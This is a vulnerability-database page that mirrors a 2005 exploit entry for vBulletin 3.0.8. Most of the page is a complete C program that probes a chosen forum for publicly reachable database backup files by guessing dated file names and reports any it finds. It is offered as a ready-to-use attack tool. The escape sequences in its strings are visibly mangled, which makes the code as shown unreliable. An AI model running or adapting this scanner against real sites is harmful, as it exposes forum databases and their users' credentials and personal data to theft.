vBulletin 3.0.8 – Accessible Database Backup Searcher (3)

漏洞ID	1055361	漏洞类型
发布时间	2005-08-31	更新时间	2005-08-31
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	PHP	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/1189

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
 * Needed to pentest a few vBulletin forums so I wrote this junk real quick.
 * Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html
 * Good paths: /forum/ / /forum/archive/ /forum/cpadmin/
 * Update 1: Code error fixes. /str0ke ([email protected])
 * Update 2: Fixed datestring-version for international boards by hals1 ([email protected])
 * Update 3: French vBulletin boards added by Tyn0r ([email protected])
 * /str0ke
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 80

char *getdate(int b){
	static char datestring[40];
	time_t ttt;
        int minustime;
	minustime=86400 * b;
	ttt=time(NULL)- minustime;
	strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt));
	printf("Searching: forumbackup-%s.sqln", datestring);
	return(datestring);
}

char *getdate2(int b){
        static char datestring[40];
        time_t ttt;
        int minustime;
        minustime=86400 * b;
        ttt=time(NULL)- minustime;
        strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt));
        printf("Searching: forumbackup-%s.sqln", datestring);
        return(datestring);
}

char *getdate3(int b){
        static char datestring[40];
        time_t ttt;
        int minustime;
        minustime=86400 * b;
        ttt=time(NULL)- minustime;
        strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt));
        printf("Searching: forumbackup-%s.sqln", datestring);
        return(datestring);
}

char *getdate4(int b){
	static char datestring[40];
	time_t ttt;
        int minustime;
	minustime=86400 * b;
	ttt=time(NULL)- minustime;
	strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1
	printf("Searching: forumbackup-%s.sqln", datestring);
	return(datestring);
}

char *getdate5(int b){
        static char datestring[40];
        time_t ttt;
        int minustime;
        minustime=86400 * b;
        ttt=time(NULL)- minustime;
        strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1
        printf("Searching: forumbackup-%s.sqln", datestring);
        return(datestring);
}

char *getdate6(int b){
        static char datestring[40];
        time_t ttt;
        int minustime;
        minustime=86400 * b;
        ttt=time(NULL)- minustime;
        strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1
        printf("Searching: forumbackup-%s.sqln", datestring);
        return(datestring);
}

char *getdate7(int b){
        static char datestring[40];
        time_t ttt;
        int minustime;
        minustime=86400 * b;
        ttt=time(NULL)- minustime;
        strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r
        printf("Searching: forumbackup-%s.sqln", datestring);
        return(datestring);
}

main(int argc, char *argv[]) {

 char buffer[1000],host[255],path[255],dog[255],c;
 int sd, rc, i=0, d=0, b;
 struct sockaddr_in localAddr, servAddr;
 struct hostent *h;

char *http =
         "Accept: */*rn"
         "Accept-Language: en-us,en;q=0.5rn"
         "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
         "User-Agent: we want your backups - milw0rmrn"
         "Connection: closernrn";

if ( argc != 5) {
	        printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.comn");
	        printf("usage: %s -h hostname/ip -p /path/ n",argv[0]);
	        exit(0);
}


 while ((c = getopt (argc, argv, "h:p:")) != EOF)
       switch(c)
       {
               case 'h':
                       strncpy(host,optarg,sizeof(host));
                       break;
               case 'p':
                       strncpy(path,optarg,sizeof(path));
                       break;
       }

 h = gethostbyname(host);
 
 if(h==NULL) {
   printf("Unknown Host '%s'n",host);
   exit(1);
 }

 printf("Trying To Connect To [%s]n",host);
 while(1){
 servAddr.sin_family = h->h_addrtype;
 memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
 servAddr.sin_port = htons(SERVER_PORT);
 sd = socket(AF_INET, SOCK_STREAM, 0);
 
 if(sd<0) {
   perror("Can Not Open The Socketn");
   exit(1);
 }

 localAddr.sin_family = AF_INET;
 localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
 localAddr.sin_port = htons(0);

 rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));
 
 if(rc<0) {
   printf("%d: cannot bind port TCP %un",sd,SERVER_PORT);
   perror("error ");
   exit(1);
 }

 rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));

 if(rc<0) {
   perror("cannot connectn");
   exit(1);
 }
   memset(buffer,0,sizeof(buffer));

   if ( d == 0 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate(i),host,http);
   } else if ( d == 1 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate2(i),host,http);
   } else if ( d == 2 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate3(i),host,http);
   } else if ( d == 3 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate4(i),host,http);
   } else if ( d == 4 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate5(i),host,http);
   } else if ( d == 5 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate6(i),host,http);
   } else if ( d == 6 ) {
   snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate7(i),host,http);
   }

   rc = send(sd,buffer, strlen(buffer), 0);
   memset(buffer,0,sizeof(buffer));

while(1)
       {
       rc=recv(sd,buffer,sizeof(buffer),0);
       if(strstr(buffer,"404")) break;
       if(strstr(buffer,"200 OK"))
               {
	       if ( d == 0 ) {
               printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate(i));
	       }
	       if ( d == 1 ) {
               printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate2(i));
	       }
	       if ( d == 2 ) {
               printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate3(i));
	       }
	       if ( d == 3 ) {
	       printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate4(i));
	       }
	       if ( d == 4 ) {
	       printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate5(i));
	       }
	       if ( d == 5 ) {
	       printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate6(i));
	       }
	       if ( d == 6 ) {
	       printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate7(i));
	       }
               exit(0);
               }
       memset(buffer,0,sizeof(buffer));
       }
close(sd);

if ( d < 6 ) {
	d++;
} else {
	d=0;
        i++;
}
}
}

// milw0rm.com [2005-08-31]

相关推荐: Nokia 6210/3310/3330 Handset Malformed SMS User Data Header Denial Of Service Vulnerability

Nokia 6210/3310/3330 Handset Malformed SMS User Data Header Denial Of Service Vulnerability 漏洞ID 1102702 漏洞类型 Failure to Handle Ex…

文章版权归作者所有，未经允许请勿转载。

THE END